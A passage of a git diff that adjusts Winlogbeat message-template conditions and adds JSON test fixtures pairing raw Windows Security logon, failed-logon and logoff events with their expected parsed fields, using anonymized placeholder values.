"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}" - }, + "value": "{555908d1-a6d7-4695-8e1e-26931d2012f4}" + } + ] + }, + { + "value": "Sysmon {winlog.opcode} event on {winlog.computer_name}", + "conditions": [ { - "field": "event.action" - }, + "field": "winlog.provider_guid", + "value": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" + } + ] + }, + { + "value": "Sysmon : no event on {winlog.computer_name}", + "conditions": [ { - "field": "winlog.computer_name" + "field": "winlog.provider_guid", + "value": "{00000000-0000-0000-0000-000000000000}" + } + ] + }, + { + "value": "Security event : {event.action} on {winlog.computer_name}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}" } ] }, @@ -117,12 +1735,6 @@ { "field": "event.module", "value": "powershell" - }, - { - "field": "event.action" - }, - { - "field": "winlog.computer_name" } ] }, diff --git a/Beats/winlogbeat/tests/security_event_4624.json b/Beats/winlogbeat/tests/security_event_4624.json new file mode 100644 index 000000000..fe8a200a5 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4624.json @@ -0,0 +1,145 @@ +{ + "input": { + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process \",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process \",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4624", + "kind": "event", + "module": "security", + "original": "An account was successfully logged on.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tWS-USER-01$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nLogon Information:\n\tLogon Type:\t\t3\n\tRestricted Admin Mode:\t-\n\tVirtual Account:\t\tNo\n\tElevated Token:\t\tNo\n\nImpersonation Level:\t\tImpersonation\n\nNew Logon:\n\tSecurity ID:\t\tS-4-5-6\n\tAccount Name:\t\ttarget_user\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0xFCEBB74A\n\tLinked Logon ID:\t\t0x0\n\tNetwork Account Name:\t-\n\tNetwork Account Domain:\t-\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\n\nProcess Information:\n\tProcess ID:\t\t0x2f0\n\tProcess Name:\t\tC:\\Windows\\System32\\executable.exe\n\nNetwork Information:\n\tWorkstation Name:\tWS-USER-01\n\tSource Network Address:\t1.2.3.4\n\tSource Port:\t\t29051\n\nDetailed Authentication Information:\n\tLogon Process:\t\tProcess \n\tAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\n\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\n\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\n\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-12T08:41:05.803000Z", + "action": { + "id": 4624, + "outcome": "success", + "properties": { + "AuthenticationPackageName": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0", + "ElevatedToken": "%%1843", + "ImpersonationLevel": "%%1833", + "IpAddress": "1.2.3.4", + "IpPort": "29051", + "KeyLength": "0", + "LmPackageName": "-", + "LogonGuid": "{00000000-0000-0000-0000-000000000000}", + "LogonProcessName": "Process ", + "LogonType": "3", + "ProcessId": "0x2f0", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "RestrictedAdminMode": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "WS-USER-01$", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetLinkedLogonId": "0x0", + "TargetLogonId": "0xfcebb74a", + "TargetOutboundDomainName": "-", + "TargetOutboundUserName": "-", + "TargetUserName": "target_user", + "TargetUserSid": "S-4-5-6", + "TransmittedServices": "-", + "VirtualAccount": "%%1843", + "WorkstationName": "WS-USER-01" + } + }, + "agent": { + "ephemeral_id": "12345678-1234-5678-9012-123456789012", + "id": "abcd1234-abcd-1234-ef56-abcdef123456", + "type": "winlogbeat", + "version": "7.0.0" + }, + "client": { + "ip": "1.2.3.4" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "abcdefab-1234-5678-9012-abcdefabcdef", + "name": "hostname", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Datacenter", + "platform": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "hostname" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "Process " + } + }, + "client": { + "name": "WS-USER-01", + "os": { + "type": "windows" + } + }, + "server": { + "name": "hostname", + "os": { + "type": "windows" + } + } + }, + "user": { + "id": "S-1-2-3", + "name": "WS-USER-01$", + "target": { + "domain": "DOMAIN", + "id": "S-4-5-6", + "name": "target_user" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "hostname.company.com", + "event_id": "4624", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x3e7", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 752, + "thread": { + "id": 7960 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1170100815", + "task": "Logon", + "version": 2 + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4625.json b/Beats/winlogbeat/tests/security_event_4625.json new file mode 100644 index 000000000..85bda7ac7 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4625.json @@ -0,0 +1,193 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4625", + "kind": "event", + "module": "security", + "outcome": "failure", + "provider": "Microsoft-Windows-Security-Auditing", + "reason": "user_not_exist", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-12T08:40:34.260000Z", + "action": { + "id": 4625, + "outcome": "failure", + "properties": { + "AuthenticationPackageName": "Kerberos", + "FailureReason": "%%2313", + "IpAddress": "-", + "IpPort": "-", + "KeyLength": "0", + "LmPackageName": "-", + "LogonProcessName": "Channel", + "LogonType": "3", + "ProcessId": "0x338", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "Status": "0xc000006d", + "SubStatus": "0xc0000064", + "SubjectDomainName": "J_DOE", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "WORKSTATION$", + "SubjectUserSid": "S-1-2-3", + "TargetUserSid": "S-1-0-0", + "TransmittedServices": "-", + "WorkstationName": "WORKSTATION" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "WORKSTATION", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ], + "mac": [ + "00-00-00-00-00-00-00-00", + "11-11-11-11-11-11", + "A0-B1-C2-D3-E4-F5", + "AA-BB-CC-DD-EE-FF" + ], + "name": "hostname", + "os": { + "build": "14393.7428", + "family": "windows", + "kernel": "10.0.14393.7426 (rs1_release.240926-1524)", + "name": "Windows Server 2016 Datacenter", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "process": { + "executable": "C:\\Windows\\System32\\executable.exe", + "name": "executable.exe", + "pid": 824 + }, + "related": { + "hosts": [ + "WORKSTATION", + "hostname" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "Channel" + } + }, + "client": { + "name": "WORKSTATION", + "os": { + "type": "windows" + } + }, + "server": { + "name": "hostname", + "os": { + "type": "windows" + } + } + }, + "server": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ] + }, + "source": { + "address": "WORKSTATION", + "domain": "WORKSTATION", + "port": 0 + }, + "user": { + "id": "S-1-2-3", + "name": "WORKSTATION$", + "target": { + "id": "S-1-0-0" + } + }, + "winlog": { + "activity_id": "{12345678-abcd-efab-cdef-123456789012}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "WORKSTATION.johndoe.com", + "event_id": "4625", + "keywords": [ + "Audit Failure" + ], + "logon": { + "failure": { + "reason": "Unknown user name or bad password.", + "status": "This is either due to a bad username or authentication information", + "sub_status": "User logon with misspelled or bad user account" + }, + "id": "0x3e7", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 824, + "thread": { + "id": 28936 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2552812283", + "task": "Logon" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4634.json b/Beats/winlogbeat/tests/security_event_4634.json new file mode 100644 index 000000000..035469c13 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4634.json @@ -0,0 +1,112 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 